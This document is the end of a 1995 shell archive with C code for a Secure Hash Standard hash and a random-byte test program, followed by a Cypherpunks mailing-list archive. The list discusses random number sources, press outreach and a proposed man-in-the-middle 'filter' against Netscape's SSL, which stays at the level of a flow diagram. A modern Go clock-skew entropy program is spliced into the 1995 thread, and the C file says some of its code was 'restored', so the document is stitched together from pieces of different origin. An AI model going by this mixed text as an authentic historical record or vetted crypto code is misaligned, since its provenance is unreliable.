X * Permission to use, copy, and modify this software without fee
X * is hereby granted, provided that this entire notice is included in
X * all copies of any software which is or includes a copy or
X * modification of this software and in all copies of the supporting
X * documentation for such software.
X *
X * This software may be subject to United States export controls.
X *
X * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
X * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
X * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
X * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
X */
X
/*
X * Secure Hash Standard
X * proposed NIST SHS
X * coded for byte strings: number of bits is a multiple of 8
X *
X * Copyright (c) 1992, 1994 AT&T Bell Laboratories
X * Coded by Jim Reeds 5 Feb 1992
X * Enhanced by Jack Lacy 1993, 1994
X */
X
/*
X * unsigned char * shs(char *s, int n);
X *
X * input:
X *	s	character array to be hashed
X *	n	length of s in BYTES
X * output:
X *	return value: address of 5 unsigned longs holding hash
X *
X * machine dependencies:
X *	assumes a char is 8 bits
X */
X
/*
X * passes test on:
X *	gauss (vax)
X *	3k (cray)
X *	slepian (MIPS)
X *	bird (sparcstation II)
X */
X
#include <stdio.h>
#include <string.h>
#include <sys/types.h>	/* u_long */
X
typedef struct {
X	long totalLength;
X	unsigned long h[5];
X	unsigned long w[80];
} SHS_CTX;
X
unsigned char *shs();
#ifdef SOLARIS2X
#define bzero(b, l) memset(b, 0, l)
#define bcopy(s, d, l) memcpy(d, s, l)
#define bcmp(s, d, l) (memcmp(s, d, l)? 1 : 0)
#endif
X
/* per-call state: this code is not reentrant */
static long nbits;
static unsigned long *h;
static unsigned long *w;
static void shs1();
/* static void packl (unsigned long);
static void pack (unsigned char, unsigned char, unsigned char, unsigned char);
static void shs1(void);
static void opack(unsigned char); */
X
#define MASK (unsigned long)0xffffffffL /* in case more than 32 bits per long */
X
/*
X * stick one byte into the current block; process the block when full
X *
X * (the tail of this function and the head of pack() were lost in the
X * archived copy; they are restored here to match the surrounding code)
X */
static void opack(c)
X	unsigned char c;
{
X	int n32, nd32, shiftbits;
X	register unsigned long x, mask, y;
X
X	nd32 = (int)(nbits >> 5);	/* nbits/32 */
X	n32 = (int)(nbits & 0x1f);	/* nbits%32 */
X	shiftbits = 24-n32;		/* big-endian byte position in the word */
X
X	x = ((unsigned long)c)<<shiftbits;
X	mask = ((unsigned long)0xff)<<shiftbits;
X	y = w[nd32] & ~mask;		/* clear the slot, then drop the byte in */
X	w[nd32] = MASK&(y | x);
X	nbits += 8;
X	if(nbits==512){
X		nbits = 0;
X		shs1();
X	}
}
X
/*
X * stick 4 bytes into the current block; process the block when full
X */
static void pack(c0, c1, c2, c3)
X	unsigned char c0, c1, c2, c3;
{
X	int nd32;
X
X	nd32 = (int)(nbits >> 5);
X	w[nd32] = (u_long)(((u_long)c0<<24) | ((u_long)c1<<16) | ((u_long)c2<<8) | (u_long)c3);
X
X	nbits += 32;
X	if(nbits==512){
X		nbits = 0;
X		shs1();
X	}
}
X
/*
X * stick a 4 byte number into the current block
X */
static void packl(x)
X	unsigned long x;
{
X	pack((unsigned char)(x>>24), (unsigned char)(x>>16),
X		(unsigned char)(x>>8), (unsigned char)(x>>0));
}
X
/*
X * process one block
X */
static void shs1()
{
X	unsigned long *wp;
X	unsigned long temp;
X	unsigned long A, B, C, D, E;
X	int t;
X
#define S(n,x) (u_long)(((x)<<(n))|((MASK&(x))>>(32-(n))))
X
X	/* message schedule: expand 16 words to 80 */
X	wp = w;
X	t = 8;
X	do {
X		wp[16] = S(1, (u_long)(wp[13]^wp[8]^wp[2]^wp[0]));
X		wp[17] = S(1, (u_long)(wp[14]^wp[9]^wp[3]^wp[1]));
X		wp[18] = S(1, (u_long)(wp[15]^wp[10]^wp[4]^wp[2]));
X		wp[19] = S(1, (u_long)(wp[16]^wp[11]^wp[5]^wp[3]));
X		wp[20] = S(1, (u_long)(wp[17]^wp[12]^wp[6]^wp[4]));
X		wp[21] = S(1, (u_long)(wp[18]^wp[13]^wp[7]^wp[5]));
X		wp[22] = S(1, (u_long)(wp[19]^wp[14]^wp[8]^wp[6]));
X		wp[23] = S(1, (u_long)(wp[20]^wp[15]^wp[9]^wp[7]));
X		wp += 8;
X		t--;
X	} while (t > 0);
X
X	A = h[0];
X	B = h[1];
X	C = h[2];
X	D = h[3];
X	E = h[4];
X
X	t = 0;
X	while (t<20) {
X		temp = S(5,A) + E + w[t++];
X		temp += (unsigned long)0x5a827999L + ((B&C)|(D&~B));
X		E = D; D = C; C = S(30,B); B = A; A = temp;
X	}
X	while (t<40) {
X		temp = S(5,A) + E + w[t++];
X		temp += (unsigned long)0x6ed9eba1L + (B^C^D);
X		E = D; D = C; C = S(30,B); B = A; A = temp;
X	}
X	while (t<60) {
X		temp = S(5,A) + E + w[t++];
X		temp += (unsigned long)0x8f1bbcdcL + ((B&C)|(B&D)|(C&D));
X		E = D; D = C; C = S(30,B); B = A; A = temp;
X	}
X	while (t<80) {
X		temp = S(5,A) + E + w[t++];
X		temp += (unsigned long)0xca62c1d6L + (B^C^D);
X		E = D; D = C; C = S(30,B); B = A; A = temp;
X	}
X	h[0] = MASK&(h[0] + A);
X	h[1] = MASK&(h[1] + B);
X	h[2] = MASK&(h[2] + C);
X	h[3] = MASK&(h[3] + D);
X	h[4] = MASK&(h[4] + E);
}
X
#define CHARSTOLONG(wp,s,i) {*wp++ = (u_long)((((u_long)(s[i])&0xff)<<24)|(((u_long)(s[i+1])&0xff)<<16)|(((u_long)(s[i+2])&0xff)<<8)|(u_long)(s[i+3]&0xff));}
X
void shsInit(mdContext)
X	SHS_CTX *mdContext;
{
X	nbits = 0;
X	mdContext->h[0] = (unsigned long)0x67452301L;
X	mdContext->h[1] = (unsigned long)0xefcdab89L;
X	mdContext->h[2] = (unsigned long)0x98badcfeL;
X	mdContext->h[3] = (unsigned long)0x10325476L;
X	mdContext->h[4] = (unsigned long)0xc3d2e1f0L;
X	mdContext->totalLength = 0;
}
X
/*
X * NOTE: nbits is reset on every call, so a partial block left over from a
X * previous shsUpdate() is discarded.  Call it once, or only with lengths
X * that are multiples of 64 bytes except for the final call (as fShsDigest
X * does).
X */
void shsUpdate(mdContext, s, n)
X	SHS_CTX *mdContext;
X	unsigned char *s;
X	unsigned int n;
{
X	register unsigned long *wp;
X	long nn = n;
X	long i;
X
X	w = mdContext->w;
X	h = mdContext->h;
X	mdContext->totalLength += n;
X
X	nbits = 0;
X	n = n/(u_long)64;
X	wp = w;
X
X	while(n>0){
X		CHARSTOLONG(wp,s,0);
X		CHARSTOLONG(wp,s,4);
X		CHARSTOLONG(wp,s,8);
X		CHARSTOLONG(wp,s,12);
X		CHARSTOLONG(wp,s,16);
X		CHARSTOLONG(wp,s,20);
X		CHARSTOLONG(wp,s,24);
X		CHARSTOLONG(wp,s,28);
X		CHARSTOLONG(wp,s,32);
X		CHARSTOLONG(wp,s,36);
X		CHARSTOLONG(wp,s,40);
X		CHARSTOLONG(wp,s,44);
X		CHARSTOLONG(wp,s,48);
X		CHARSTOLONG(wp,s,52);
X		CHARSTOLONG(wp,s,56);
X		CHARSTOLONG(wp,s,60);
X		n--;
X		wp = w;
X		s = (s + 64);
X		shs1();
X	}
X	i=nn%64;
X	while(i>3) {
X		CHARSTOLONG(wp,s,0);
X		s = (s + 4);
X		nbits += (u_long)32;
X		i -= 4;
X	}
X	while (i) {
X		opack((unsigned char)*s++);
X		i--;
X	}
}
X
/* pad (0x80, zeros to 448 bits, then the 64 bit message length in bits) */
void shsFinal(mdContext)
X	SHS_CTX *mdContext;
{
X	long nn = mdContext->totalLength;
X	w = mdContext->w;
X	h = mdContext->h;
X
X	opack(128);
X	while(nbits != 448)opack(0);
X	packl((unsigned long)(nn>>29));
X	packl((unsigned long)(nn<<3));
X
X	/* if(nbits != 0)
X		handle_exception(CRITICAL,"shsFinal(): nbits != 0\n");*/
}
X
/* one-shot interface: returns a pointer to a static 20 byte digest */
unsigned char *shs(s, n)
X	unsigned char *s;
X	long n;
{
X	SHS_CTX *mdContext;
X	static SHS_CTX mdC;
X	static unsigned char ret[20];
X	int i;
X
X	mdContext = &mdC;
X
X	shsInit(mdContext);
X	shsUpdate(mdContext, s, n);
X	shsFinal(mdContext);
X	for (i=0; i<5; i++) {
X		ret[i*4] = (mdContext->h[i]>>24)&0xff;
X		ret[i*4+1] = (mdContext->h[i]>>16)&0xff;
X		ret[i*4+2] = (mdContext->h[i]>>8)&0xff;
X		ret[i*4+3] = (mdContext->h[i])&0xff;
X	}
X
X	return ret;
}
X
/*int fread(char *, int, int, FILE *);*/
X
/* digest a whole file; returns a pointer to the 5 word state */
unsigned long *fShsDigest(in)
X	FILE *in;
{
X	SHS_CTX *mdContext;
X	static SHS_CTX mdC;	/* static: the caller gets a pointer into it */
X	unsigned char buffer[1024];
X	long length, total;
X
X	mdContext = &mdC;
X
X	bzero(buffer, 1024);
X
X	total = 0;
X	shsInit(mdContext);
X	while ((length = fread(buffer, 1, 1024, in)) != 0) {
X		total += length;
X		shsUpdate(mdContext, buffer, length);
X	}
X	shsFinal(mdContext);
X
X	return mdContext->h;
}
SHAR_EOF
  $shar_touch -am 0930142495 'shs.c' &&
  chmod 0644 'shs.c' ||
  echo 'restore of shs.c failed'
  shar_count="`wc -c < 'shs.c'`"
  test 7142 -eq "$shar_count" ||
    echo "shs.c: original size 7142, current size $shar_count"
fi
# ============= randtest.c ==============
if test -f 'randtest.c' && test X"$1" != X"-c"; then
  echo 'x - skipping randtest.c (file already exists)'
else
  echo 'x - extracting randtest.c (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'randtest.c' &&
#include <stdlib.h>	/* atoi() */
X
int randbyte();
X
/*
X * randtest [count]: draw count random bytes (with -DDEBUGRND each draw
X * prints the two raw words and the byte).  With no argument the counter
X * starts at 0 and the loop runs effectively forever, for piping into a
X * statistical test.
X */
int main(argc,argv)
int argc;
char **argv;
{
X	int count;
X
X	if (argc==1)
X		count = 0;
X	else
X		count = atoi(argv[1]) + 1;
X	while (--count)
X		randbyte();
X	return 0;
}
SHAR_EOF
  $shar_touch -am 0930150095 'randtest.c' &&
  chmod 0644 'randtest.c' ||
  echo 'restore of randtest.c failed'
  shar_count="`wc -c < 'randtest.c'`"
  test 149 -eq "$shar_count" ||
    echo "randtest.c: original size 149, current size
$shar_count"
fi
exit 0

From jbass at dmsd.com Sat Sep 30 12:39:36 1995 From: jbass at dmsd.com (John L. Bass) Date: Sat, 30 Sep 95 12:39:36 PDT Subject: NetScape's dependence upon RSA down for the count! Message-ID: <9509301940.AA11065@dmsd.com> and yes I'll accept server hacks which run on linux and bsd too :) John From bplib at wat.hookup.net Sat Sep 30 12:41:47 1995 From: bplib at wat.hookup.net (Tim Philp) Date: Sat, 30 Sep 95 12:41:47 PDT Subject: The 4th Estate Message-ID: I am a freelance journalist who has been 'lurking' on your list for about six months now. I have a great interest in cryptography and the mathematics behind cyphers. I write a weekly column about computers and the Internet in a small town newspaper in Brantford Ontario. I was particularly interested in the SSL crack that took place recently and I wrote an article about the feat and talked about some of the implications of this use of the Internet. In previous articles I have spoken about the need for widespread, strong, cryptography to both protect personal privacy and to aid secure business communications. I have been following the debate about a Cypherpunk spokesperson with some interest and I thought that I would throw in my two cents worth (2.5 cents Canadian! :-}) It is always difficult to get a group of strong individualists to agree to a common cause or to allow one person to become a spokesman for the group. Such a position grants a certain amount of 'power', for lack of a better word, to such a person. I think that there is no need for such a person. Each of us has a different point of view that, while sharing some common ideas, cannot be reconciled with any 'official' position. I think that the accomplishments of the group speak volumes and have no fear, the public is listening. I do, however, detect some small amount of smugness attached to comments about 'Joe Sixpack'.
While it is true that the average citizen is not interested in esoteric subjects such as cryptography, do not underestimate the importance of communicating with them. Their votes and elected representatives will control the future legislation regarding cryptography. It is vital that they understand just what is at stake in this debate, and that they make decisions based upon knowledge and not upon fear. Therefore, it is important that we ALL do our share of communicating with the press and the public. Without our input, the scaremongers will carry the day. In the meantime, keep up the good work. If anyone wants copies of the articles that appeared in the paper, E-mail me and I will send them. If there is enough demand I will post them to the list. Don't worry, they are only about 700 words each. Regards, Tim Philp Brantford, Ontario Canada -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAy/KL1MAAAEEALIrcJLNr3LTauphCzkU1SNtZkUPCEH14xIxVaiSM/7850/y 6qkA17N0/4E20RiyQIZ7TZf2vpbaTHs88+jU4Lvb/fBWBnL1AZBdW7I1+vNSMGzG ljBzU9X+BXrBFYi4CzpWhqOo+a2IQaJx4sZ7w/GG59gdFIyps3seeMISF+fVAAUR tCBUaW0gUGhpbHAgPGJwbGliQG5pYy5ob29rdXAubmV0Pg== =6Rrp -----END PGP PUBLIC KEY BLOCK----- From tcmay at got.net Sat Sep 30 12:44:49 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 30 Sep 95 12:44:49 PDT Subject: Simple Hardware RNG Idea Message-ID: At 5:57 PM 9/30/95, zinc wrote: >regarding the use of radioactive material for generating random >numbers, lantern mantles are fairly radioactive. i'd say they would >be able to emit sufficient particles for OTP use, especially if one >builds a device that just constructs the pads all the time (ie, it >just sits there making various pads of X min length and Y max length, >storing them on a hard drive, or RAM if you're that rich). you just >request a pad from the machine when you need it and encrypt whatever >with it... Thoriated lantern mantles are only slightly radioactive. The counts per second is what matters.
This will be a function of a lot of things, not the least of which is the detector area and the fluence of alphas intercepted. At the risk of repeating myself, there are easier ways of generating essentially random numbers. --Tim May (P.S., as my last word on this for a while. You may have heard that RAM chips can have bits flipped by the alpha particles emitted by low levels of uranium and thorium present in packaging materials. And that cosmic rays can do the same thing, at a lower error rate. Well, I discovered these effects in 1977 and wrote the original papers on this "soft error" effect. I'm not making an appeal to authority here, just telling you why I'm skeptical of all of these proposals to make a radioactive decay-based random number source. There are much easier ways.) ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From alano at teleport.com Sat Sep 30 12:57:28 1995 From: alano at teleport.com (Alan Olsen) Date: Sat, 30 Sep 95 12:57:28 PDT Subject: Operation Stop The Aliens Message-ID: <199509302004.NAA11763@desiree.teleport.com> At 09:11 AM 9/30/95 -0500, you wrote: >-- [ From: FELIX R. WILSON SR. * EMC.Ver #2.3 ] -- > Attachment: natltr.txt Code: 00H7GFL \ Created: 09-29-95, 06:21 PM [34 Kb] > >The Attached File Is For Viewing It I In Text Format Please Forward To >Everyone on the net work. and post to every board " Please.." >//BEGIN BINARY MAIL SEGMENT: What the hell is going on here! Why am I suddenly seeing spam from every nazi wannabe on the net? Some of this crap has been posted to the Cypherpunks list. What kind of weird reputation do we have in the outside world? 
I would venture to guess that we have more anti-authoritarians here than authoritarians. Are these people that clueless (or stupid) to post that crap here? So far, I have been getting neo-nazi spam, Christian Nazi spam, Libertarian nazi chain letter spam, and (why do I expect vikings to descend from the ceiling) a whole lot more. The next thing I expect to see here is "evil aliens are stealing my luggage" spam. I expect this bozo will have his account removed pretty quick... Maybe we need a few national stories about the horrible things that happen to people who spam mailing lists and newsgroups. ("Suddenly a wrecking crew showed up at their house and leveled it to the ground.") | Minister of Forced Caffinization in the DNRC | alano at teleport.com | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | | -- PGP 2.6.2 key available on request -- | behind the keyboard.| | http://www.teleport.com/~alano | | From merriman at arn.net Sat Sep 30 14:02:23 1995 From: merriman at arn.net (David K. Merriman) Date: Sat, 30 Sep 95 14:02:23 PDT Subject: my favorite random-numbers-in-software package (unix) Message-ID: <199509302103.QAA26651@arnet.arn.net> At 03:46 PM 9/30/95 -0400, you wrote: ... ... >The basic idea is that you exploit randomness in the drift between >the processor clock and the rate at which interval timer interrupts >occur. Such drift occurs even on idle processors. randbyte() assumes >that there's at least about .4 bits of "entropy" per interrupt, which is >(probably) a safe assumption on modern processors. Randomness introduced >by the OS (scheduler, etc.) can add to the overall entropy, but shouldn't >be relied upon by itself. > >An advantage to this approach (using clock skew) is that the randomness >doesn't depend on external events like user input, network traffic or >processor load.
That makes it especially attractive for generating keys >on unattended servers, e.g., for generating Diffie-Hellman exponents. >Note, however, that very (very) slow and heavily-loaded processors may >not provide enough cycles to the truerand process between interrupts for >these assumptions to hold. Also, all bets are off on processors that use >a single clock source for both interval timing and CPU clocking. Even with the exclusion of processors using single-source clocking for interval and CPU timing, this would *seem* to be somewhat hazardous. Any two clocking mechanisms that are 'mixed' are going to result in a number of harmonics, or beat frequencies. While your system - at any given instant - is quite likely to have a decent amount of randomness in it, I'd hazard a guess that repetitive use would result in a discernible pattern. Even something as 'coarse' as an interrupt timer has a finite range that it can (must) operate in. Even if the CPU oscillator is based on a ceramic resonator (nowhere near as stable/accurate as a crystal), the clock on it is going to stay within +/-1% (worst case, for a *really* cheap oscillator) of frequency, and drift not more than some number of Parts Per Million per Period. Mixing the innate (relative) accuracy of two oscillators, and the necessarily limited amount of drift that they're capable of, would seem to result in an unacceptably low-yield source of 'real' randomness. Of course, I'm kind of math-impaired when it comes to crypto, so my 20+ years of electronics (hardware) experience may not apply in this case :-) Dave Merriman This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] ------------------- M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3 M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> My web page: http://www.geopages.com/CapitolHill/1148 From jbass at dmsd.com Sat Sep 30 15:14:10 1995 From: jbass at dmsd.com (John L. Bass) Date: Sat, 30 Sep 95 15:14:10 PDT Subject: NetScape's dependence upon RSA down for the count! Message-ID: <9509302213.AA11359@dmsd.com> Ok, several people have asked: > Please explain to me how you can break SSL using the above method. I > don't follow your line of thought. How could my fake www server > intercept and redirect packets to netscape.com short of hacking a DNS > server?

   client -> filter   Client sends packet with K(c)
   filter -> Server   filter forwards packet with K(f)
   filter <- Server   Server sends encrypts with K(f)
   client <- filter   filter re-encrypts with K(c)

As the protocol progresses the filter also uses the master key, and follows the renegotiation as the master key expires. The existence of a working filter is enough to invalidate the security in NetScape's claims. hacking a DNS server is one way, spoofing a DNS reply to named is easier, simply packaging the filter into a router/bridge close to the server is more effective ... even if hacking the incoming phoneline/T1 line to the server and inserting a very transparent bridge AKA a phone tap. There are enough dollars to make the risks ... :) John BTW ... how do I join these two lists? Where are they archived to catch up with past traffic?
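The clock-skew generator described in the text David Merriman quotes above, together with the check his objection asks for, as an added example; this is not the truerand package's code. It counts loop iterations between interval-timer ticks, keeps the low bit of each count, scans those bits for periodicity at small lags (the beat between two clocks that Merriman predicts would appear there), strips constant bias with a von Neumann corrector, budgets interrupts at the quoted 0.4 bits each, and hashes the raw counts down to key material. A Go time.Ticker stands in for setitimer/SIGALRM, so scheduler and timer-resolution jitter contribute alongside any oscillator drift; the 0.4-bit credit is the quoted assumption, not something this code measures, and the lag scan is a sanity check, not a proof of randomness.

```go
package main

import (
	"crypto/sha256"
	"encoding/binary"
	"fmt"
	"math"
	"time"
)

// collectSkewCounts spins a counter until the interval timer fires, records
// how many iterations fit in that interval, then resets and repeats n times.
// The Ticker stands in for setitimer(2)/SIGALRM, so scheduler and
// timer-resolution jitter contribute along with any oscillator drift.
func collectSkewCounts(n int, interval time.Duration) []uint64 {
	ticker := time.NewTicker(interval)
	defer ticker.Stop()
	counts := make([]uint64, 0, n)
	var c uint64
	for len(counts) < n {
		select {
		case <-ticker.C:
			counts = append(counts, c)
			c = 0
		default:
			c++
		}
	}
	return counts
}

// lowBits keeps the least significant bit of each count: the high bits are
// nearly the same from interval to interval, only the low ones move.
func lowBits(counts []uint64) []byte {
	bits := make([]byte, len(counts))
	for i, c := range counts {
		bits[i] = byte(c & 1)
	}
	return bits
}

// clockArtifact looks for periodicity: for each lag up to maxLag it measures
// how often bit i equals bit i+lag and returns the lag whose agreement is
// furthest from 0.5, with that distance. A beat between the two clocks
// would show up here as a large distance at the beat period.
func clockArtifact(bits []byte, maxLag int) (int, float64) {
	worstLag, worstDev := 0, 0.0
	for lag := 1; lag <= maxLag && lag < len(bits); lag++ {
		same := 0
		for i := 0; i+lag < len(bits); i++ {
			if bits[i] == bits[i+lag] {
				same++
			}
		}
		if d := math.Abs(float64(same)/float64(len(bits)-lag) - 0.5); d > worstDev {
			worstLag, worstDev = lag, d
		}
	}
	return worstLag, worstDev
}

// vonNeumann strips a constant bias from independent bits (01 -> 0, 10 -> 1,
// 00 and 11 dropped). It does nothing about correlation between bits.
func vonNeumann(bits []byte) []byte {
	out := make([]byte, 0, len(bits)/4)
	for i := 0; i+1 < len(bits); i += 2 {
		if bits[i] != bits[i+1] {
			out = append(out, bits[i])
		}
	}
	return out
}

// samplesNeeded credits each interrupt with entropyPerSample bits (the text
// assumes about 0.4) and says how many to gather for bitsWanted key bits.
func samplesNeeded(bitsWanted int, entropyPerSample float64) int {
	return int(math.Ceil(float64(bitsWanted) / entropyPerSample))
}

// distill hashes the raw counts down to key material. The hash hides bias
// and periodicity but adds no entropy: the key is only as unpredictable as
// the counts that went in.
func distill(counts []uint64) [32]byte {
	buf := make([]byte, 8*len(counts))
	for i, c := range counts {
		binary.LittleEndian.PutUint64(buf[8*i:], c)
	}
	return sha256.Sum256(buf)
}

func main() {
	counts := collectSkewCounts(samplesNeeded(128, 0.4), time.Millisecond) // 320 ticks
	bits := lowBits(counts)
	lag, dev := clockArtifact(bits, 32)
	fmt.Printf("%d interrupts, worst lag %d off by %.3f, %d debiased bits\n",
		len(bits), lag, dev, len(vonNeumann(bits)))
	fmt.Printf("key %x\n", distill(counts))
}
```

A lag whose agreement sits well away from 0.5 is the pattern Merriman expects from mixing two oscillators; if one shows up, the fix is a longer interval or more samples per output bit, not a different hash.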
From gmixo at alpha.c2.org Sat Sep 30 15:28:31 1995 From: gmixo at alpha.c2.org (gmixo) Date: Sat, 30 Sep 95 15:28:31 PDT Subject: Auto-signing Message-ID: <199509302209.PAA03217@infinity.c2.org> would someone please send me information about any autosigning services.... like the gratis auto-signing.... and others like it.... thanks gmixo From jbass at dmsd.com Sat Sep 30 15:40:11 1995 From: jbass at dmsd.com (John L. Bass) Date: Sat, 30 Sep 95 15:40:11 PDT Subject: NetScape's dependence upon RSA down for the count! Message-ID: <9509302239.AA11407@dmsd.com> > jbass at dmsd.com writes:
> >   client -> filter   Client sends packet with K(c)
> >   filter -> Server   filter forwards packet with K(f)
> >   filter <- Server   Server sends encrypts with K(f)
> >   client <- filter   filter re-encrypts with K(c)
> > As the protocol progresses the filter also uses the master key, > > and follows the renegotiation as the master key expires. > > Yeah, but in order for this to work, the fake server needs to know > netscape.com's private (secret) key, no? > > -jon No ... the public part of any server private key is held by the filter and not returned to the client. The client only encrypts with public keys provided by the filter. The Server only encrypts with public keys provided by the filter. The filter has cleartext of the entire session. John From jbass at dmsd.com Sat Sep 30 15:50:19 1995 From: jbass at dmsd.com (John L. Bass) Date: Sat, 30 Sep 95 15:50:19 PDT Subject: NetScape's dependence upon RSA down for the count! Message-ID: <9509302250.AA11430@dmsd.com> Ok ... one more time ... the filter has to replace the client/server keys in the packet stream with its own ...
John From mab at crypto.com Sat Sep 30 15:50:27 1995 From: mab at crypto.com (Matt Blaze) Date: Sat, 30 Sep 95 15:50:27 PDT Subject: my favorite random-numbers-in-software package (unix) In-Reply-To: <199509302103.QAA26651@arnet.arn.net> Message-ID: <199509302301.TAA16936@crypto.com> David Merriman writes: > > Even with the exclusion of processors using single-source clocking for > interval and CPU timing, this would *seem* to be somewhat hazardous. Any two > clocking mechanisms that are 'mixed' are going to result in a number of > harmonics, or beat frequencies. While your system - at any given instant - > is quite likely to have a decent amount of randomness in it, I'd hazard a > guess that repetitive use would result in a discernible pattern. Even > something as 'coarse' as an interrupt timer has a finite range that it can > (must) operate in. Even if the CPU oscillator is based on a ceramic > resonator (nowhere near as stable/accurate as a crystal), the clock on it is > going to stay within +/-1% (worst case, for a *really* cheap oscillator) of > frequency, and drift not more than some number of Parts Per Million per > Period. Mixing the innate (relative) accuracy of two oscillators, and the > necessarily limited amount of drift that they're capable of, would seem to > result in an unacceptably low-yield source of 'real' randomness. I'm the first to agree that, in the absence of some good analysis of the exact platform on which it is run, the clock-skew approach is built on a very weak foundation. But informal (and completely ad hoc) analysis suggests that it might be more promising than you'd first expect. While the drift between the two clocks is likely only very small, we're also not asking for very much; we need less than one bit worth of uncertainty in an accumulator that burns processor cycles until some (smaller) number of clock intervals have occurred. 
(The OS might also not give you all those cycles, adding to the uncertainty, although you can't really count on this in the case of high-priority processes or unloaded machines). I (and a few others) have run some tests on this on a couple of (bare) processors in an effort to find artifacts of the clock periods in the low-order bits of the counter, with no success. This, of course, hardly constitutes a "proof". I'd love to see some good analysis of this technique, particularly with an eye toward quantifying the quality and bandwidth of the output and finding better parameters for the minimum interval rate, etc. -matt PS there are other "magic" techniques for getting randomness without special hardware that are proposed from time to time but that never really undergo enough analysis for my taste. For example, at CRYPTO '94 (or maybe '93) there was an interesting proposal to use software to measure the air flow inside the disk drive. From ericm at lne.com Sat Sep 30 16:22:50 1995 From: ericm at lne.com (Eric Murray) Date: Sat, 30 Sep 95 16:22:50 PDT Subject: NetScape's dependence upon RSA down for the count! In-Reply-To: <9509302239.AA11407@dmsd.com> Message-ID: <199509302336.QAA23456@slack.lne.com> > > jbass at dmsd.com writes:
> > >   client -> filter   Client sends packet with K(c)
> > >   filter -> Server   filter forwards packet with K(f)
> > >   filter <- Server   Server sends encrypts with K(f)
> > >   client <- filter   filter re-encrypts with K(c)
> > > As the protocol progresses the filter also uses the master key, > > > and follows the renegotiation as the master key expires. > > > > Yeah, but in order for this to work, the fake server needs to know > > netscape.com's private (secret) key, no? > > > > -jon > > No ... the public part of any server private key is held by the filter > and not returned to the client. The client only encrypts with public > keys provided by the filter. The Server only encrypts with public keys > provided by the filter.
> The filter has cleartext of the entire session. What you have described is the classic 'man in the middle' attack. Netscape claims that SSL V.3 is immune to the MITM attack in appendix D.4 of the SSL V.3 spec. You will need to get the 'filter' (MITM) key signed by Verisign. Or hack Verisign's server-key-signing key. BTW your 'offer' is silly- this is not a trivial amount of work, and you would not deserve any credit for coming up with so ordinary an attack. Write the code yourself, or pay the market rate for it. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From perry at piermont.com Sat Sep 30 16:41:12 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sat, 30 Sep 95 16:41:12 PDT Subject: Simple Hardware RNG Idea In-Reply-To: Message-ID: <199509302340.TAA25393@frankenstein.piermont.com> Timothy C. May writes: > 2. Incorporating Am-241 or other alpha emitters in microcurie levels would > require licensing, regulatory oversight, etc., etc. Don't count on it. > > 3. Data rates are fairly low. Anything that "clicks" at high rates (> 1K > counts per second) would be too radioactive to ship. > > 4. Zener diodes and other random noise sources are cheaper to build, more > consistent in output, and easier to integrate into actual products. However, radiation detection devices are far easier to assure correct operation. You can buy pre-built radiation counters with RS-232 interfaces, so it's really just a question in many cases of buying them and small radiation sources, the latter of which are available in most scientific supply catalogs. Unlike other devices, it's very hard for outsiders to tamper with radiation sources to make them produce specially skewed numbers.... Perry From ericm at lne.com Sat Sep 30 17:11:58 1995 From: ericm at lne.com (Eric Murray) Date: Sat, 30 Sep 95 17:11:58 PDT Subject: NetScape's dependence upon RSA down for the count!
In-Reply-To: <9509302250.AA11430@dmsd.com> Message-ID: <199510010025.RAA23630@slack.lne.com> > > > Ok ... one more time ... the filter has to replace the client/server > keys in the packet stream with its own ... Where in SSL are these 'client/server keys' being sent? A pointer to the page of the V3 spec where these keys are described will do. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From Don.Stephenson at Eng.Sun.COM Sat Sep 30 17:15:57 1995 From: Don.Stephenson at Eng.Sun.COM (Don Stephenson) Date: Sat, 30 Sep 95 17:15:57 PDT Subject: NetScape's dependence upon RSA down for the count! Message-ID: <9510010003.AA08494@icenine.Eng.Sun.COM> I haven't read the SSL spec for a while but my understanding was that the server passed its public key to the client via a certificate signed by a mutually trusted certificate authority (i.e., Verisign). How would the filter be able to forge such a certificate ? - Don > From jbass at dmsd.com Sat Sep 30 16:47:11 1995 > Date: Sat, 30 Sep 95 16:39:57 -0600 > From: jbass at dmsd.com (John L. Bass) > To: www-security at ns2.rutgers.edu, cypherpunks at toad.com > Subject: Re: NetScape's dependence upon RSA down for the count! > > > jbass at dmsd.com writes:
> > >   client -> filter   Client sends packet with K(c)
> > >   filter -> Server   filter forwards packet with K(f)
> > >   filter <- Server   Server sends encrypts with K(f)
> > >   client <- filter   filter re-encrypts with K(c)
